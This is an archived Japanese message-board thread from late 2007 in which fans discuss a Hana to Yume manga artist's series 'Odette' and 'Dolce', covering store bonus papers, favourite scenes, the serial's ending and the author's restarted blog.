コミクスで読むとね。雑誌は間があるから、やっとかって感じだけど

145 :花と名無しさん:2007/11/21(水) 19:32:29 ID:???0
花とゆめの柱を読む前にアニメイトでコミックスを買ったから
ペーパーが付いていて驚いた。んで、嬉しい〜〜〜
オデット1巻はどこかの書店でペーパーが付いてたよね。
欲しかったけど地方なのでgetできず。
持ってる人いる?

146 :花と名無しさん:2007/11/22(木) 00:59:36 ID:???O
ドルチェの表紙がいい感じだ
この人は面白い構図で漫画描けそうだから、色々チャレンジしてほしい


147 :花と名無しさん:2007/11/22(木) 01:09:25 ID:???O
つーかほっぺにチューで言うこと聞くビュートにワロタ

148 :花と名無しさん:2007/11/22(木) 12:10:59 ID:???0
>>147
普段が、マユリが頼んでも頼んでも
何でも面倒くせ〜って感じの俺様だから
ほっぺチューなんかでいいんか?!ってギャップがカワイイw

149 :花と名無しさん:2007/11/22(木) 17:32:04 ID:???0
>>145
自分は花ゆめの柱見る前に
普通の書店でドルチェ買ってしまった…orz
ペーパー貰えるって知ってたら
アニメイトで買ったのに。

150 :花と名無しさん:2007/11/22(木) 21:06:10 ID:???O
ブラックマコちゃんが好きだー

151 :花と名無しさん:2007/11/22(木) 21:07:04 ID:???0
あぁ…忘れててアニメイト素通りして普通の本屋で買ってしまった…
行く前にここ見ておけばよかった

152 :花と名無しさん:2007/11/22(木) 22:18:52 ID:???0
キャラが地獄の王とか恐怖公とか異名がある割に
あまり怖くないというか、そういう描写を見てみたい気もするw
でもほのぼのしているこの世界観が好きなんだよな

153 :花と名無しさん:2007/11/22(木) 22:46:52 ID:???O
威圧するときのマコちゃんはコワカッコイイ
ビュートがマユリを抱っこしたところ(重くなったって言われたとこ)に禿萌え

154 :花と名無しさん:2007/11/23(金) 14:36:43 ID:???0
>>145
1巻のおまけペーパーは三省堂書店だったよ。
普通の本屋で刈っちゃった後で知って、もう一度三省堂で1冊買った。
ドレスアップしたオデットと洋子が可愛い。

ダブった分は、友人へ進呈。
あまり漫画を読まない人だけど、面白いって言ってくれたよ。

155 :花と名無しさん:2007/11/23(金) 16:55:48 ID:???0
1巻のペーパー持ってる人羨ましい…(´・ω・`)
ドレスアップしたオデットと洋子見てみたいなあ。
ジュリさんのコメントとかも書いてあったのかな?

156 :花と名無しさん:2007/11/23(金) 17:16:18 ID:BGbDgiXQ0
作品一覧に載ってるのはどうやったら読めますか?
オデットとドルチェは普通に売ってるから買ったんだけど・・・

157 :花と名無しさん:2007/11/23(金) 17:25:52 ID:???0
>>156
オデットとドルチェ以外はコミクスに収録されてないから
当時掲載された雑誌(ザ花・花ゆめ)を手に入れるしかないんじゃないかな。
ヤフオクとかで探してみては?

短編集出して欲しいってアンケに書いて送ったりしてるけど
新人さんで短編集出すのは難しそうだしなぁ…。

158 :花と名無しさん:2007/11/23(金) 18:51:07 ID:???0
>>156
花とゆめプラス創刊号1000円だった('A`)(諦)

159 :158:2007/11/23(金) 18:52:37 ID:???0
間違えた>>157

160 :花と名無しさん:2007/11/23(金) 20:01:33 ID:???0
ジュリさんブログ再開してくれたよかった
チロかわいいよチロ

161 :花と名無しさん:2007/11/23(金) 20:27:14 ID:???0
どこよ。

162 :花と名無しさん:2007/11/23(金) 21:20:37 ID:???0
>>160
kwsk

163 :花と名無しさん:2007/11/23(金) 21:30:44 ID:???0
160さんじゃないけど、ヒント。
仲良しのマンガ家さんのBlogにリンクあったよ。

164 :花と名無しさん:2007/11/23(金) 21:40:14 ID:???0
悩殺の人?

165 :花と名無しさん:2007/11/23(金) 21:53:46 ID:???0
むー。ちょっと頑張って思い出してみます

166 :花と名無しさん:2007/11/23(金) 22:30:05 ID:???0
見つけた

ttp://arerererere.blog36.fc2.com/

167 :花と名無しさん:2007/11/24(土) 00:47:12 ID:???0
トン!なんというアドレスwww

168 :花と名無しさん:2007/11/24(土) 00:59:01 ID:???0
連載終わったのか(´・ω・`)

169 :花と名無しさん:2007/11/26(月) 21:13:06 ID:???O
ブログ更新しまくりだねw
のんびりできる休みなんて久しぶりだろうから、ゆっくり疲れとってほしいな
そしてまた作品が読めればそれで幸せだー

170 :花と名無しさん:2007/11/28(水) 14:23:25 ID:???O
ジュリさんのお母さんも絵描いてるんだね。上手くて驚いた。

リアルタイムに近況知れるのいいね(´Д`*)

171 :花と名無しさん:2007/11/28(水) 19:24:06 ID:???O
最後にオデットとくっつくのゎ誰だ!?

172 :花と名無しさん:2007/11/29(木) 18:57:19 ID:???0
今四打
グレースよかったね
未来におけるロボットと人間の関係性とか生命と精神の意味とか
もうちょっとスケール広がる展開へ行くかと思ったけど俺はSFの読み過ぎのようだ
まあほのぼの読後感のいい終わり方になりそうだしいいか

173 :花と名無しさん:2007/11/29(木) 22:38:47 ID:???0
>>172
次で終わらなければ、そういう展開もあったかもね…
あれなんか目から汁が出てきた

174 :花と名無しさん:2007/11/30(金) 00:07:22 ID:???0
>>172
自分ももうちょっと伏線を使ったSF的な話に期待してたんだけど、
OZを軽くて可愛い感じにしたような

175 :花と名無しさん:2007/12/04(火) 00:49:34 ID:???O
本誌スレより


次回作も本誌っぽい━━━━(゚∀゚)━━━━!!嬉しすぐる!!!!
ブログを見る限り今はドルチェ描いてそうだね(あれって今描いてるネームだよね?

176 :花と名無しさん:2007/12/04(火) 07:50:42 ID:???O
ブログみたー(゜∀゜)ー!!
もうやってないと思てたから嬉しすぎる!!

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)